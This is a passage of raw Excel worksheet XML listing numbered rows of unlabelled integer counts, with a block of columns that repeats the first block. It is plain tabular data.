      <c r="K1104" s="7">
        <v>2862</v>
      </c>
      <c r="L1104" s="8">
        <v>1</v>
      </c>
      <c r="M1104" s="8">
        <v>2</v>
      </c>
      <c r="N1104" s="8">
        <v>1</v>
      </c>
      <c r="O1104" s="8">
        <v>4</v>
      </c>
      <c r="P1104" s="8">
        <v>3</v>
      </c>
      <c r="Q1104" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1105" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1105" s="7">
        <v>4422</v>
      </c>
      <c r="B1105" s="8">
        <v>25</v>
      </c>
      <c r="C1105" s="8">
        <v>1</v>
      </c>
      <c r="D1105" s="8">
        <v>10</v>
      </c>
      <c r="E1105" s="8">
        <v>15</v>
      </c>
      <c r="F1105" s="8">
        <v>3</v>
      </c>
      <c r="G1105" s="8">
        <v>2</v>
      </c>
      <c r="H1105" s="8">
        <v>56</v>
      </c>
      <c r="K1105" s="7">
        <v>4422</v>
      </c>
      <c r="L1105" s="8">
        <v>25</v>
      </c>
      <c r="M1105" s="8">
        <v>1</v>
      </c>
      <c r="N1105" s="8">
        <v>10</v>
      </c>
      <c r="O1105" s="8">
        <v>15</v>
      </c>
      <c r="P1105" s="8">
        <v>3</v>
      </c>
      <c r="Q1105" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1106" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1106" s="7">
        <v>4571</v>
      </c>
      <c r="B1106" s="8">
        <v>350</v>
      </c>
      <c r="C1106" s="8">
        <v>0</v>
      </c>
      <c r="D1106" s="8">
        <v>6</v>
      </c>
      <c r="E1106" s="8">
        <v>2</v>
      </c>
      <c r="F1106" s="8">
        <v>3</v>
      </c>
      <c r="G1106" s="8">
        <v>1</v>
      </c>
      <c r="H1106" s="8">
        <v>362</v>
      </c>
      <c r="K1106" s="7">
        <v>4571</v>
      </c>
      <c r="L1106" s="8">
        <v>350</v>
      </c>
      <c r="M1106" s="8">
        <v>0</v>
      </c>
      <c r="N1106" s="8">
        <v>6</v>
      </c>
      <c r="O1106" s="8">
        <v>2</v>
      </c>
      <c r="P1106" s="8">
        <v>3</v>
      </c>
      <c r="Q1106" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1107" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1107" s="7">
        <v>4759</v>
      </c>
      <c r="B1107" s="8">
        <v>20</v>
      </c>
      <c r="C1107" s="8">
        <v>1</v>
      </c>
      <c r="D1107" s="8">
        <v>335</v>
      </c>
      <c r="E1107" s="8">
        <v>606</v>
      </c>
      <c r="F1107" s="8">
        <v>42</v>
      </c>
      <c r="G1107" s="8">
        <v>17</v>
      </c>
      <c r="H1107" s="8">
        <v>1021</v>
      </c>
      <c r="K1107" s="7">
        <v>4759</v>
      </c>
      <c r="L1107" s="8">
        <v>20</v>
      </c>
      <c r="M1107" s="8">
        <v>1</v>
      </c>
      <c r="N1107" s="8">
        <v>335</v>
      </c>
      <c r="O1107" s="8">
        <v>606</v>
      </c>
      <c r="P1107" s="8">
        <v>42</v>
      </c>
      <c r="Q1107" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="1108" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1108" s="7">
        <v>4761</v>
      </c>
      <c r="B1108" s="8">
        <v>26</v>
      </c>
      <c r="C1108" s="8">
        <v>1</v>
      </c>
      <c r="D1108" s="8">
        <v>1</v>
      </c>
      <c r="E1108" s="8">
        <v>0</v>
      </c>
      <c r="F1108" s="8">
        <v>3</v>
      </c>
      <c r="G1108" s="8">
        <v>0</v>
      </c>
      <c r="H1108" s="8">
        <v>31</v>
      </c>
      <c r="K1108" s="7">
        <v>4761</v>
      </c>
      <c r="L1108" s="8">
        <v>26</v>
      </c>
      <c r="M1108" s="8">
        <v>1</v>
      </c>
      <c r="N1108" s="8">
        <v>1</v>
      </c>
      <c r="O1108" s="8">
        <v>0</v>
      </c>
      <c r="P1108" s="8">
        <v>3</v>
      </c>
      <c r="Q1108" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1109" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1109" s="7">
        <v>4764</v>
      </c>
      <c r="B1109" s="8">
        <v>24</v>
      </c>
      <c r="C1109" s="8">
        <v>1</v>
      </c>
      <c r="D1109" s="8">
        <v>0</v>
      </c>
      <c r="E1109" s="8">
        <v>50</v>
      </c>
      <c r="F1109" s="8">
        <v>2</v>
      </c>
      <c r="G1109" s="8">
        <v>1</v>
      </c>
      <c r="H1109" s="8">
        <v>78</v>
      </c>
      <c r="K1109" s="7">
        <v>4764</v>
      </c>
      <c r="L1109" s="8">
        <v>24</v>
      </c>
      <c r="M1109" s="8">
        <v>1</v>
      </c>
      <c r="N1109" s="8">
        <v>0</v>
      </c>
      <c r="O1109" s="8">
        <v>50</v>
      </c>
      <c r="P1109" s="8">
        <v>2</v>
      </c>
      <c r="Q1109" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1110" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1110" s="7">
        <v>4771</v>
      </c>
      <c r="B1110" s="8">
        <v>26</v>
      </c>
      <c r="C1110" s="8">
        <v>1</v>
      </c>
      <c r="D1110" s="8">
        <v>16</v>
      </c>
      <c r="E1110" s="8">
        <v>2</v>
      </c>
      <c r="F1110" s="8">
        <v>6</v>
      </c>
      <c r="G1110" s="8">
        <v>3</v>
      </c>
      <c r="H1110" s="8">
        <v>54</v>
      </c>
      <c r="K1110" s="7">
        <v>4771</v>
      </c>
      <c r="L1110" s="8">
        <v>26</v>
      </c>
      <c r="M1110" s="8">
        <v>1</v>
      </c>
      <c r="N1110" s="8">
        <v>16</v>
      </c>
      <c r="O1110" s="8">
        <v>2</v>
      </c>
      <c r="P1110" s="8">
        <v>6</v>
      </c>
      <c r="Q1110" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1111" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1111" s="7">
        <v>4773</v>
      </c>
      <c r="B1111" s="8">
        <v>25</v>
      </c>
      <c r="C1111" s="8">
        <v>0</v>
      </c>
      <c r="D1111" s="8">
        <v>2</v>
      </c>
      <c r="E1111" s="8">
        <v>6</v>
      </c>
      <c r="F1111" s="8">
        <v>4</v>
      </c>
      <c r="G1111" s="8">
        <v>1</v>
      </c>
      <c r="H1111" s="8">
        <v>38</v>
      </c>
      <c r="K1111" s="7">
        <v>4773</v>
      </c>
      <c r="L1111" s="8">
        <v>25</v>
      </c>
      <c r="M1111" s="8">
        <v>0</v>
      </c>
      <c r="N1111" s="8">
        <v>2</v>
      </c>
      <c r="O1111" s="8">
        <v>6</v>
      </c>
      <c r="P1111" s="8">
        <v>4</v>
      </c>
      <c r="Q1111" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1112" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1112" s="7">
        <v>4774</v>
      </c>
      <c r="B1112" s="8">
        <v>7</v>
      </c>
      <c r="C1112" s="8">
        <v>1</v>
      </c>
      <c r="D1112" s="8">
        <v>100</v>
      </c>
      <c r="E1112" s="8">
        <v>250</v>
      </c>
      <c r="F1112" s="8">
        <v>25</v>
      </c>
      <c r="G1112" s="8">
        <v>25</v>
      </c>
      <c r="H1112" s="8">
        <v>408</v>
      </c>
      <c r="K1112" s="7">
        <v>4774</v>
      </c>
      <c r="L1112" s="8">
        <v>7</v>
      </c>
      <c r="M1112" s="8">
        <v>1</v>
      </c>
      <c r="N1112" s="8">
        <v>100</v>
      </c>
      <c r="O1112" s="8">
        <v>250</v>
      </c>
      <c r="P1112" s="8">
        <v>25</v>
      </c>
      <c r="Q1112" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="1113" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1113" s="7">
        <v>4775</v>
      </c>
      <c r="B1113" s="8">
        <v>26</v>
      </c>
      <c r="C1113" s="8">
        <v>1</v>
      </c>
      <c r="D1113" s="8">
        <v>11</v>
      </c>
      <c r="E1113" s="8">
        <v>8</v>
      </c>
      <c r="F1113" s="8">
        <v>6</v>
      </c>
      <c r="G1113" s="8">
        <v>4</v>
      </c>
      <c r="H1113" s="8">
        <v>56</v>
      </c>
      <c r="K1113" s="7">
        <v>4775</v>
      </c>
      <c r="L1113" s="8">
        <v>26</v>
      </c>
      <c r="M1113" s="8">
        <v>1</v>
      </c>
      <c r="N1113" s="8">
        <v>11</v>
      </c>
      <c r="O1113" s="8">
        <v>8</v>
      </c>
      <c r="P1113" s="8">
        <v>6</v>
      </c>
      <c r="Q1113" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1114" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1114" s="7">
        <v>4776</v>
      </c>
      <c r="B1114" s="8">
        <v>48</v>
      </c>
      <c r="C1114" s="8">
        <v>0</v>
      </c>
      <c r="D1114" s="8">
        <v>20</v>
      </c>
      <c r="E1114" s="8">
        <v>20</v>
      </c>
      <c r="F1114" s="8">
        <v>8</v>
      </c>
      <c r="G1114" s="8">
        <v>0</v>
      </c>
      <c r="H1114" s="8">
        <v>96</v>
      </c>
      <c r="K1114" s="7">
        <v>4776</v>
      </c>
      <c r="L1114" s="8">
        <v>48</v>
      </c>
      <c r="M1114" s="8">
        <v>0</v>
      </c>
      <c r="N1114" s="8">
        <v>20</v>
      </c>
      <c r="O1114" s="8">
        <v>20</v>
      </c>
      <c r="P1114" s="8">
        <v>8</v>
      </c>
      <c r="Q1114" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1115" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1115" s="7">
        <v>4777</v>
      </c>
      <c r="B1115" s="8">
        <v>0</v>
      </c>
      <c r="C1115" s="8">
        <v>0</v>
      </c>
      <c r="D1115" s="8">
        <v>0</v>
      </c>
      <c r="E1115" s="8">
        <v>0</v>
      </c>
      <c r="F1115" s="8">
        <v>0</v>
      </c>
      <c r="G1115" s="8">
        <v>0</v>
      </c>
      <c r="H1115" s="8">
        <v>0</v>
      </c>
      <c r="K1115" s="7">
        <v>4777</v>
      </c>
      <c r="L1115" s="8">
        <v>0</v>
      </c>
      <c r="M1115" s="8">
        <v>0</v>
      </c>
      <c r="N1115" s="8">
        <v>0</v>
      </c>
      <c r="O1115" s="8">
        <v>0</v>
      </c>
      <c r="P1115" s="8">
        <v>0</v>
      </c>
      <c r="Q1115" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1116" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1116" s="7">
        <v>4778</v>
      </c>
      <c r="B1116" s="8">
        <v>26</v>
      </c>
      <c r="C1116" s="8">
        <v>0</v>
      </c>
      <c r="D1116" s="8">
        <v>3</v>
      </c>
      <c r="E1116" s="8">
        <v>3</v>
      </c>
      <c r="F1116" s="8">
        <v>3</v>
      </c>
      <c r="G1116" s="8">
        <v>2</v>
      </c>
      <c r="H1116" s="8">
        <v>37</v>
      </c>
      <c r="K1116" s="7">
        <v>4778</v>
      </c>
      <c r="L1116" s="8">
        <v>26</v>
      </c>
      <c r="M1116" s="8">
        <v>0</v>
      </c>
      <c r="N1116" s="8">
        <v>3</v>
      </c>
      <c r="O1116" s="8">
        <v>3</v>
      </c>
      <c r="P1116" s="8">
        <v>3</v>
      </c>
      <c r="Q1116" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1117" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1117" s="7">
        <v>4779</v>
      </c>
      <c r="B1117" s="8">
        <v>1</v>
      </c>
      <c r="C1117" s="8">
        <v>1</v>
      </c>
      <c r="D1117" s="8">
        <v>15</v>
      </c>
      <c r="E1117" s="8">
        <v>58</v>
      </c>
      <c r="F1117" s="8">
        <v>2</v>
      </c>
      <c r="G1117" s="8">
        <v>0</v>
      </c>
      <c r="H1117" s="8">
        <v>77</v>
      </c>
      <c r="K1117" s="7">
        <v>4779</v>
      </c>
      <c r="L1117" s="8">
        <v>1</v>
      </c>
      <c r="M1117" s="8">
        <v>1</v>
      </c>
      <c r="N1117" s="8">
        <v>15</v>
      </c>
      <c r="O1117" s="8">
        <v>58</v>
      </c>
      <c r="P1117" s="8">
        <v>2</v>
      </c>
      <c r="Q1117" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1118" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1118" s="7">
        <v>4780</v>
      </c>
      <c r="B1118" s="8">
        <v>51</v>
      </c>
      <c r="C1118" s="8">
        <v>0</v>
      </c>
      <c r="D1118" s="8">
        <v>0</v>
      </c>
      <c r="E1118" s="8">
        <v>2</v>
      </c>
      <c r="F1118" s="8">
        <v>1</v>
      </c>
      <c r="G1118" s="8">
        <v>2</v>
      </c>
      <c r="H1118" s="8">
        <v>56</v>
      </c>
      <c r="K1118" s="7">
        <v>4780</v>
      </c>
      <c r="L1118" s="8">
        <v>51</v>
      </c>
      <c r="M1118" s="8">
        <v>0</v>
      </c>
      <c r="N1118" s="8">
        <v>0</v>
      </c>
      <c r="O1118" s="8">
        <v>2</v>
      </c>
      <c r="P1118" s="8">
        <v>1</v>
      </c>
      <c r="Q1118" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1119" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1119" s="7">
        <v>4782</v>
      </c>
      <c r="B1119" s="8">
        <v>6</v>
      </c>
      <c r="C1119" s="8">
        <v>1</v>
      </c>
      <c r="D1119" s="8">
        <v>0</v>
      </c>
      <c r="E1119" s="8">
        <v>0</v>
      </c>
      <c r="F1119" s="8">
        <v>2</v>
      </c>
      <c r="G1119" s="8">
        <v>6</v>
      </c>
      <c r="H1119" s="8">
        <v>15</v>
      </c>
      <c r="K1119" s="7">
        <v>4782</v>
      </c>
      <c r="L1119" s="8">
        <v>6</v>
      </c>
      <c r="M1119" s="8">
        <v>1</v>
      </c>
      <c r="N1119" s="8">
        <v>0</v>
      </c>
      <c r="O1119" s="8">
        <v>0</v>
      </c>
      <c r="P1119" s="8">
        <v>2</v>
      </c>
      <c r="Q1119" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1120" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1120" s="7">
        <v>4783</v>
      </c>
      <c r="B1120" s="8">
        <v>25</v>
      </c>
      <c r="C1120" s="8">
        <v>0</v>
      </c>
      <c r="D1120" s="8">
        <v>5</v>
      </c>
      <c r="E1120" s="8">
        <v>2</v>
      </c>
      <c r="F1120" s="8">
        <v>7</v>
      </c>
      <c r="G1120" s="8">
        <v>3</v>
      </c>
      <c r="H1120" s="8">
        <v>42</v>
      </c>
      <c r="K1120" s="7">
        <v>4783</v>
      </c>
      <c r="L1120" s="8">
        <v>25</v>
      </c>
      <c r="M1120" s="8">
        <v>0</v>
      </c>
      <c r="N1120" s="8">
        <v>5</v>
      </c>
      <c r="O1120" s="8">
        <v>2</v>
      </c>
      <c r="P1120" s="8">
        <v>7</v>
      </c>
      <c r="Q1120" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1121" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1121" s="7">
        <v>4784</v>
      </c>
      <c r="B1121" s="8">
        <v>26</v>
      </c>
      <c r="C1121" s="8">
        <v>1</v>
      </c>
      <c r="D1121" s="8">
        <v>0</v>
      </c>
      <c r="E1121" s="8">
        <v>0</v>
      </c>
      <c r="F1121" s="8">
        <v>2</v>
      </c>
      <c r="G1121" s="8">
        <v>4</v>
      </c>
      <c r="H1121" s="8">
        <v>33</v>
      </c>
      <c r="K1121" s="7">
        <v>4784</v>
      </c>
      <c r="L1121" s="8">
        <v>26</v>
      </c>
      <c r="M1121" s="8">
        <v>1</v>
      </c>
      <c r="N1121" s="8">
        <v>0</v>
      </c>
      <c r="O1121" s="8">
        <v>0</v>
      </c>
      <c r="P1121" s="8">
        <v>2</v>
      </c>
      <c r="Q1121" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1122" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1122" s="7">
        <v>4786</v>
      </c>
      <c r="B1122" s="8">
        <v>6</v>
      </c>
      <c r="C1122" s="8">
        <v>0</v>
      </c>
      <c r="D1122" s="8">
        <v>0</v>
      </c>
      <c r="E1122" s="8">
        <v>0</v>
      </c>
      <c r="F1122" s="8">
        <v>2</v>
      </c>
      <c r="G1122" s="8">
        <v>3</v>
      </c>
      <c r="H1122" s="8">
        <v>11</v>
      </c>
      <c r="K1122" s="7">
        <v>4786</v>
      </c>
      <c r="L1122" s="8">
        <v>6</v>
      </c>
      <c r="M1122" s="8">
        <v>0</v>
      </c>
      <c r="N1122" s="8">
        <v>0</v>
      </c>
      <c r="O1122" s="8">
        <v>0</v>
      </c>
      <c r="P1122" s="8">
        <v>2</v>
      </c>
      <c r="Q1122" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1123" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1123" s="7">
        <v>4787</v>
      </c>
      <c r="B1123" s="8">
        <v>26</v>
      </c>
      <c r="C1123" s="8">
        <v>2</v>
      </c>
      <c r="D1123" s="8">
        <v>0</v>
      </c>
      <c r="E1123" s="8">
        <v>5</v>
      </c>
      <c r="F1123" s="8">
        <v>5</v>
      </c>
      <c r="G1123" s="8">
        <v>2</v>
      </c>
      <c r="H1123" s="8">
        <v>40</v>
      </c>
      <c r="K1123" s="7">
        <v>4787</v>
      </c>
      <c r="L1123" s="8">
        <v>26</v>
      </c>
      <c r="M1123" s="8">
        <v>2</v>
      </c>
      <c r="N1123" s="8">
        <v>0</v>
      </c>
      <c r="O1123" s="8">
        <v>5</v>
      </c>
      <c r="P1123" s="8">
        <v>5</v>
      </c>
      <c r="Q1123" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1124" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1124" s="7">
        <v>4788</v>
      </c>
      <c r="B1124" s="8">
        <v>25</v>
      </c>
      <c r="C1124" s="8">
        <v>1</v>
      </c>
      <c r="D1124" s="8">
        <v>1</v>
      </c>
      <c r="E1124" s="8">
        <v>3</v>
      </c>
      <c r="F1124" s="8">
        <v>1</v>
      </c>
      <c r="G1124" s="8">
        <v>1</v>
      </c>
      <c r="H1124" s="8">
        <v>32</v>
      </c>
      <c r="K1124" s="7">
        <v>4788</v>
      </c>
      <c r="L1124" s="8">
        <v>25</v>
      </c>
      <c r="M1124" s="8">
        <v>1</v>
      </c>
      <c r="N1124" s="8">
        <v>1</v>
      </c>
      <c r="O1124" s="8">
        <v>3</v>
      </c>
      <c r="P1124" s="8">
        <v>1</v>
      </c>
      <c r="Q1124" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1125" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1125" s="7">
        <v>4789</v>
      </c>
      <c r="B1125" s="8">
        <v>25</v>
      </c>
      <c r="C1125" s="8">
        <v>2</v>
      </c>
      <c r="D1125" s="8">
        <v>6</v>
      </c>
      <c r="E1125" s="8">
        <v>2</v>
      </c>
      <c r="F1125" s="8">
        <v>4</v>
      </c>
      <c r="G1125" s="8">
        <v>3</v>
      </c>
      <c r="H1125" s="8">
        <v>42</v>
      </c>
      <c r="K1125" s="7">
        <v>4789</v>
      </c>
      <c r="L1125" s="8">
        <v>25</v>
      </c>
      <c r="M1125" s="8">
        <v>2</v>
      </c>
      <c r="N1125" s="8">
        <v>6</v>
      </c>
      <c r="O1125" s="8">
        <v>2</v>
      </c>
      <c r="P1125" s="8">
        <v>4</v>
      </c>
      <c r="Q1125" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1126" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1126" s="7">
        <v>4790</v>
      </c>
      <c r="B1126" s="8">
        <v>25</v>
      </c>
      <c r="C1126" s="8">
        <v>1</v>
      </c>
      <c r="D1126" s="8">
        <v>92</v>
      </c>
      <c r="E1126" s="8">
        <v>42</v>
      </c>
      <c r="F1126" s="8">
        <v>36</v>
      </c>
      <c r="G1126" s="8">
        <v>16</v>
      </c>
      <c r="H1126" s="8">
        <v>212</v>
      </c>
      <c r="K1126" s="7">
        <v>4790</v>
      </c>
      <c r="L1126" s="8">
        <v>25</v>
      </c>
      <c r="M1126" s="8">
        <v>1</v>
      </c>
      <c r="N1126" s="8">
        <v>92</v>
      </c>
      <c r="O1126" s="8">
        <v>42</v>
      </c>
      <c r="P1126" s="8">
        <v>36</v>
      </c>
      <c r="Q1126" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="1127" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1127" s="7">
        <v>4793</v>
      </c>
      <c r="B1127" s="8">
        <v>0</v>
      </c>
      <c r="C1127" s="8">
        <v>0</v>
      </c>
      <c r="D1127" s="8">
        <v>0</v>
      </c>
      <c r="E1127" s="8">
        <v>0</v>
      </c>
      <c r="F1127" s="8">
        <v>50</v>
      </c>
      <c r="G1127" s="8">
        <v>20</v>
      </c>
      <c r="H1127" s="8">
        <v>70</v>
      </c>
      <c r="K1127" s="7">
        <v>4793</v>
      </c>
      <c r="L1127" s="8">
        <v>0</v>
      </c>
      <c r="M1127" s="8">
        <v>0</v>
      </c>
      <c r="N1127" s="8">
        <v>0</v>
      </c>
      <c r="O1127" s="8">
        <v>0</v>
      </c>
      <c r="P1127" s="8">
        <v>50</v>
      </c>
      <c r="Q1127" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="1128" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1128" s="7">
        <v>4796</v>
      </c>
      <c r="B1128" s="8">
        <v>26</v>
      </c>
      <c r="C1128" s="8">
        <v>1</v>
      </c>
      <c r="D1128" s="8">
        <v>15</v>
      </c>
      <c r="E1128" s="8">
        <v>6</v>
      </c>
      <c r="F1128" s="8">
        <v>0</v>
      </c>
      <c r="G1128" s="8">
        <v>1</v>
      </c>
      <c r="H1128" s="8">
        <v>49</v>
      </c>
      <c r="K1128" s="7">
        <v>4796</v>
      </c>
      <c r="L1128" s="8">
        <v>26</v>
      </c>
      <c r="M1128" s="8">
        <v>1</v>
      </c>
      <c r="N1128" s="8">
        <v>15</v>
      </c>
      <c r="O1128" s="8">
        <v>6</v>
      </c>
      <c r="P1128" s="8">
        <v>0</v>
      </c>
      <c r="Q1128" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1129" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1129" s="7">
        <v>4798</v>
      </c>
      <c r="B1129" s="8">
        <v>25</v>
      </c>
      <c r="C1129" s="8">
        <v>1</v>
      </c>
      <c r="D1129" s="8">
        <v>7</v>
      </c>
      <c r="E1129" s="8">
        <v>0</v>
      </c>
      <c r="F1129" s="8">
        <v>3</v>
      </c>
      <c r="G1129" s="8">
        <v>1</v>
      </c>
      <c r="H1129" s="8">
        <v>37</v>
      </c>
      <c r="K1129" s="7">
        <v>4798</v>
      </c>
      <c r="L1129" s="8">
        <v>25</v>
      </c>
      <c r="M1129" s="8">
        <v>1</v>
      </c>
      <c r="N1129" s="8">
        <v>7</v>
      </c>
      <c r="O1129" s="8">
        <v>0</v>
      </c>
      <c r="P1129" s="8">
        <v>3</v>
      </c>
      <c r="Q1129" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1130" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1130" s="7">
        <v>4799</v>
      </c>
      <c r="B1130" s="8">
        <v>4</v>
      </c>
      <c r="C1130" s="8">
        <v>2</v>
      </c>
      <c r="D1130" s="8">
        <v>12</v>
      </c>
      <c r="E1130" s="8">
        <v>0</v>
      </c>
      <c r="F1130" s="8">
        <v>5</v>
      </c>
      <c r="G1130" s="8">
        <v>3</v>
      </c>
      <c r="H1130" s="8">
        <v>26</v>
      </c>
      <c r="K1130" s="7">
        <v>4799</v>
      </c>
      <c r="L1130" s="8">
        <v>4</v>
      </c>
      <c r="M1130" s="8">
        <v>2</v>
      </c>
      <c r="N1130" s="8">
        <v>12</v>
      </c>
      <c r="O1130" s="8">
        <v>0</v>
      </c>
      <c r="P1130" s="8">
        <v>5</v>
      </c>
      <c r="Q1130" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1131" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1131" s="7">
        <v>4801</v>
      </c>
      <c r="B1131" s="8">
        <v>24</v>
      </c>
      <c r="C1131" s="8">
        <v>0</v>
      </c>
      <c r="D1131" s="8">
        <v>20</v>
      </c>
      <c r="E1131" s="8">
        <v>40</v>
      </c>
      <c r="F1131" s="8">
        <v>6</v>
      </c>
      <c r="G1131" s="8">
        <v>4</v>
      </c>
      <c r="H1131" s="8">
        <v>94</v>
      </c>
      <c r="K1131" s="7">
        <v>4801</v>
      </c>
      <c r="L1131" s="8">
        <v>24</v>
      </c>
      <c r="M1131" s="8">
        <v>0</v>
      </c>
      <c r="N1131" s="8">
        <v>20</v>
      </c>
      <c r="O1131" s="8">
        <v>40</v>
      </c>
      <c r="P1131" s="8">
        <v>6</v>
      </c>
      <c r="Q1131" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1132" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1132" s="7">
        <v>4803</v>
      </c>
      <c r="B1132" s="8">
        <v>20</v>
      </c>
      <c r="C1132" s="8">
        <v>0</v>
      </c>
      <c r="D1132" s="8">
        <v>4</v>
      </c>
      <c r="E1132" s="8">
        <v>3</v>
      </c>
      <c r="F1132" s="8">
        <v>5</v>
      </c>
      <c r="G1132" s="8">
        <v>4</v>
      </c>
      <c r="H1132" s="8">
        <v>36</v>
      </c>
      <c r="K1132" s="7">
        <v>4803</v>
      </c>
      <c r="L1132" s="8">
        <v>20</v>
      </c>
      <c r="M1132" s="8">
        <v>0</v>
      </c>
      <c r="N1132" s="8">
        <v>4</v>
      </c>
      <c r="O1132" s="8">
        <v>3</v>
      </c>
      <c r="P1132" s="8">
        <v>5</v>
      </c>
      <c r="Q1132" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1133" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1133" s="7">
        <v>4804</v>
      </c>
      <c r="B1133" s="8">
        <v>28</v>
      </c>
      <c r="C1133" s="8">
        <v>0</v>
      </c>
      <c r="D1133" s="8">
        <v>0</v>
      </c>
      <c r="E1133" s="8">
        <v>4</v>
      </c>
      <c r="F1133" s="8">
        <v>12</v>
      </c>
      <c r="G1133" s="8">
        <v>9</v>
      </c>
      <c r="H1133" s="8">
        <v>53</v>
      </c>
      <c r="K1133" s="7">
        <v>4804</v>
      </c>
      <c r="L1133" s="8">
        <v>28</v>
      </c>
      <c r="M1133" s="8">
        <v>0</v>
      </c>
      <c r="N1133" s="8">
        <v>0</v>
      </c>
      <c r="O1133" s="8">
        <v>4</v>
      </c>
      <c r="P1133" s="8">
        <v>12</v>
      </c>
      <c r="Q1133" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="1134" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1134" s="7">
        <v>4805</v>
      </c>
      <c r="B1134" s="8">
        <v>25</v>
      </c>
      <c r="C1134" s="8">
        <v>1</v>
      </c>
      <c r="D1134" s="8">
        <v>0</v>
      </c>
      <c r="E1134" s="8">
        <v>0</v>
      </c>
      <c r="F1134" s="8">
        <v>2</v>
      </c>
      <c r="G1134" s="8">
        <v>12</v>
      </c>
      <c r="H1134" s="8">
        <v>40</v>
      </c>
      <c r="K1134" s="7">
        <v>4805</v>
      </c>
      <c r="L1134" s="8">
        <v>25</v>
      </c>
      <c r="M1134" s="8">
        <v>1</v>
      </c>
      <c r="N1134" s="8">
        <v>0</v>
      </c>
      <c r="O1134" s="8">
        <v>0</v>
      </c>
      <c r="P1134" s="8">
        <v>2</v>
      </c>
      <c r="Q1134" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="1135" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1135" s="7">
        <v>4806</v>
      </c>
      <c r="B1135" s="8">
        <v>26</v>
      </c>
      <c r="C1135" s="8">
        <v>2</v>
      </c>
      <c r="D1135" s="8">
        <v>102</v>
      </c>
      <c r="E1135" s="8">
        <v>63</v>
      </c>
      <c r="F1135" s="8">
        <v>12</v>
      </c>
      <c r="G1135" s="8">
        <v>9</v>
      </c>
      <c r="H1135" s="8">
        <v>214</v>
      </c>
      <c r="K1135" s="7">
        <v>4806</v>
      </c>
      <c r="L1135" s="8">
        <v>26</v>
      </c>
      <c r="M1135" s="8">
        <v>2</v>
      </c>
      <c r="N1135" s="8">
        <v>102</v>
      </c>
      <c r="O1135" s="8">
        <v>63</v>
      </c>
      <c r="P1135" s="8">
        <v>12</v>
      </c>
      <c r="Q1135" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="1136" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1136" s="7">
        <v>4807</v>
      </c>
      <c r="B1136" s="8">
        <v>26</v>
      </c>
      <c r="C1136" s="8">
        <v>1</v>
      </c>
      <c r="D1136" s="8">
        <v>2</v>
      </c>
      <c r="E1136" s="8">
        <v>3</v>
      </c>
      <c r="F1136" s="8">
        <v>9</v>
      </c>
      <c r="G1136" s="8">
        <v>3</v>
      </c>
      <c r="H1136" s="8">
        <v>44</v>
      </c>
      <c r="K1136" s="7">
        <v>4807</v>
      </c>
      <c r="L1136" s="8">
        <v>26</v>
      </c>
      <c r="M1136" s="8">
        <v>1</v>
      </c>
      <c r="N1136" s="8">
        <v>2</v>
      </c>
      <c r="O1136" s="8">
        <v>3</v>
      </c>
      <c r="P1136" s="8">
        <v>9</v>
      </c>
      <c r="Q1136" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1137" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1137" s="7">
        <v>4809</v>
      </c>
      <c r="B1137" s="8">
        <v>25</v>
      </c>
      <c r="C1137" s="8">
